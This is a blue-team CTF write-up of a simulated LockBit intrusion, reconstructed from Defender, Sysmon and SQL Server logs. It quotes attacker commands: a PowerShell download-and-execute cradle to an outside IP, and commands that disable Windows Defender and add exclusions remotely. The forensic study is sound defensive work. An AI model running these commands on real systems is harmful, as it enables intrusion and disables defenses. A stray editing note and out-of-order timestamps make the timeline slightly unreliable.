LockBit
📅 Published: 2026-04-20 13:32 | 🔄 Last Updated: 2026-05-13 16:35
https://cyberdefenders.org/blueteam-ctf-challenges/lockbit/

DC01​
Q1 Windows Defender flagged a suspicious executable. Can you identify the name of this executable?​
EventID 1116 MALWAREPROTECTION_STATE_MALWARE_DETECTED Event ID 1117 indicates that Microsoft Defender Antivirus has successfully performed a remediation action—such as quarantine, delete, or clean—on a detected threat (in EventID 1116)
From the provided alert, we can extract some important artifacts:
12/14/2023 3:08:03 PM
Path: file: \\DC01\ADMIN$\8fe9c39.exe
Process Name: C:\Windows\Sysmon64.exe
Computer: DC01.NEXTECH.local
Name: Backdoor:Win64/CobaltStrike.NP!dha
The attacker utilized an SMB network share to copy the malicious Cobalt Strike payload to DC01. Windows Defender detected this file when the Sysmon64.exe process attempted to access/read it
8fe9c39.exe
Q2 What's the path that was added to the exclusions of Windows Defender?​
I used Event ID 5007 which tracks Microsoft Defender Antivirus (Malware Protection Config Changed)
Microsoft Defender Antivirus Configuration has changed. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0
C:\
Q3 What’s the IP of the machine that initiated the remote installation of the malicious service?​
By using sysmon event ID 3 to check the victim connection:
Information 12/14/2023 3:07:03 PM Microsoft-Windows-Sysmon 3 (3)

source: 192.168.170.142 (remote machine)
des: 192.168.170.124 (DC01)
Hacker employed WinRM to remotely install the malicious service on DC01
To make sure the IP 192.168.170.124 is DC01, i used registry explorer and navigated to:
SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces
192.168.170.142
SQLServer​
Q4 What’s the name of the process that had suspicious behavior as detected by Windows Defender?​
I checked the Windows Defender logs on SQL server: \Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx and look for eventID 1116
`Path behavior:_process: C:\Windows\System32\cmd.exe,`
`Warning 12/14/2023 2:45:23 PM Windows Defender 1116 None`
I also took a look at sysmon event ID 1:
CommandLine "C:\Windows\system32\cmd.exe" /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://5.188.91.243/fJSYAso.ps1')"
ParentImage C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe ParentCommandLine "C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
So obviously the answer is:
cmd.exe
Q5 What’s the parent process name of the detected suspicious process?​
As we have analyzed in Q4:
sqlservr.exe
Q6 Initial access often involves compromised credentials. What is the SQL Server account username that was compromised?​
I checked for the Security logs:
There is nothing in there:
Looked into the Log off MSSQL

And in errorlog: we can see clear signs of a brute force attack targeting for the sa - system administrator account on SQL server.

Then, attacker succeeded:
2023-12-14 06:43:37.42 Logon Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 5.188.91.243]
2023-12-14 06:43:52.13 spid51 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-12-14 06:44:08.85 spid51 turn xp_cmdshell on
xp_cmdshell is a powerful SQL Server stored procedure that spawns a Windows command shell, executing command-line strings and returning output as text rows. It is disabled by default due to high security risks but can be enabled via sp_configure. It runs under the SQL Server Service account's security context. In SQL server attacks, hackers often try to turn this feature on to perform malicious actions.
sa
Q7 Following the compromise, a critical server configuration was modified. What feature was enabled by the attacker?​
xp_cmdshell
Q8 What’s the command executed by the attacker to disable Windows Defender on the server?​
Using Event ID 1: The hacker executed commands to perform system discovery and disable Windows Defender."
2023-12-14 14:44:51.012
CommandLine "C:\Windows\system32\cmd.exe" /c powershell "Get-Service"
Discovery
2023-12-14 14:45:13.177
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableRealtimeMonitoring 1
Q9 What's the name of the malicious script that the attacker executed upon disabling AV?​
While skimming through Event ID 1 on the SQL server, I also found this command:"
12/14/2023 2:45:23 PM
CommandLine "C:\Windows\system32\cmd.exe" /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://5.188.91.243/fJSYAso.ps1')"
fJSYAso.ps1
Q10 What's the PID of the injected process by the attacker?​
Event ID 8 most commonly refers to Sysmon Event ID 8 (CreateRemoteThread), a security monitoring event that detects when a process creates a thread in another process, frequently used to identify code injection, malware, or credential dumping
So i filtered for event ID 8 and found the following:

In this image, powershell created a remote thread in winlogon.exe by using the CreateRemoteThread form Windows API - It’s a clear sign of process injection and privilege escalation. Because winlogon.exe has the NT AUTHORITY\SYSTEM privilege.
StartAddress: 0x000001BF27290000. When an authentic thread executes code, the StartAddress should point to the name of a legitimate .dll file (For example: kernel32.dll, ntdll.dll), not an unbacked memory address.
So the injected process is winlogon.exe (responsible for managing user logon/logoff, security, and the "secure attention sequence" (Ctrl+Alt+Delete)) and the process id is:
596
Q11 Attackers often maintain access by the creation of scheduled tasks. What’s the name of the scheduled task created by the attacker?​
I looked for event ID 4698 (a new scheduled task was created on the system)

UpdateCheck
Q12 What’s the PID of the malicious process that dumped credentials?​
By using the event ID 10 (sysmon):

2023-12-14 15:00:42.228
Granted access: 0x1010 is the combination of two access privileges:
0x0010: PROCESS_VM_READ0x1000: PROCESS_QUERY_LIMITED_INFORMATION- The TargetImage: lsass.exe → an obvious sign of credential dumping
5456
Q13 What's the command used by the attacker to disable Windows Defender remotely on FileServer?​
Revisit eventID 1:
2023-12-14 15:07:01.489
Invoke-Command -ComputerName DC01 -ScriptBlock { Add-MpPreference -ExclusionPath "C:\" }
Invoke-Command -ComputerName DC01 -ScriptBlock { reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f }
Invoke-Command -ComputerName FileServer -ScriptBlock { Add-MpPreference -ExclusionPath "C:\" }
Invoke-Command -ComputerName FileServer -ScriptBlock { reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f }
2023-12-14 15:14:04.131
powershell -nop -exec bypass -EncodedCommand Invoke-Command -ComputerName DevPC -ScriptBlock { reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f }
Invoke-Command -ComputerName FileServer -ScriptBlock { reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f }
FileServer​
Q14 What's the name of the malicious service executable blocked by Windows Defender?​
Again, using the eventID 1116 in Windows Defender log:
12/14/2023 3:02:48 PM

ceabe99.exe
DevPC​
Q15 What’s the name of the ransomware executable dropped on the machine?​
By using the Event ID 11 (create files): there are a lot of file created bt vmware.exe in a short period of time”
vmware.exe
Q16 What’s the full path of the first file dropped by the ransomware?​

Again in event ID 11:
C:\Users\dmiller\Downloads\HHuYRxB06.README.txt
The attack chain​
- 2023-12-14 06:42 (Initial Access): Recorded a brute-force attack targeting the SQL server's
sa(system administrator) account. - 2023-12-14 06:43:37 (Execution): The threat actor successfully logged in and enabled the
xp_cmdshellconfiguration. - 2023-12-14 14:44:51 (Discovery): Executed
cmd.exe /c powershell "Get-Service"to enumerate system services. - 2023-12-14 14:45:13 (Defense Evasion): Disabled Windows Defender real-time monitoring using
Set-MpPreference -DisableRealtimeMonitoring 1. - 2023-12-14 14:45:23 (Execution): The threat actor utilized their elevated privileges to execute a PowerShell command, downloading a malicious script from
http://5.188.91.243/fJSYAso.ps1. - 2023-12-14 14:53:13 (Persistence): Created a scheduled task named
UpdateCheck. - 2023-12-14 15:00:42 (Credential Access): Performed credential dumping by accessing the memory of
lsass.exe. - 2023-12-14 15:02:48 (Persistence): Executed the Cobalt Strike backdoor (
ceabe99.exe) on the FileServer. - 2023-12-14 15:08:03 (Lateral Movement): The threat actor copied the file
\\DC01\ADMIN$\8fe9c39.exefrom the SQL server to DC01. - 2023-12-14 15:04:24 (Defense Evasion): Used WinRM (Port 5985) to remotely disable Windows Defender and create exclusion paths on the workstations and DC01. (Note: I corrected the port from your draft's 5589 to the standard WinRM HTTP port 5985).
- 2023-12-14 15:14:04 (Defense Evasion): Disabled Windows Defender on DevPC via a remotely executed PowerShell script.
- 2023-12-14 15:16:55 (Lateral Movement): The hacker copied the file
20df43c.exeto DevPC and executed it by callingrundll32.exe. - 2023-12-14 15:21:55 (Execution): The
rundll32.exeprocess subsequently dropped the filevmware.exe. - 2023-12-14 15:22:57 (Impact / Ransomware): The executable
C:\windows\temp\vmware.exeon DevPC proceeded to encrypt files en masse. Simultaneously, it generated the ransom note atC:\Users\dmiller\Downloads\HHuYRxB06.README.txtto notify the user.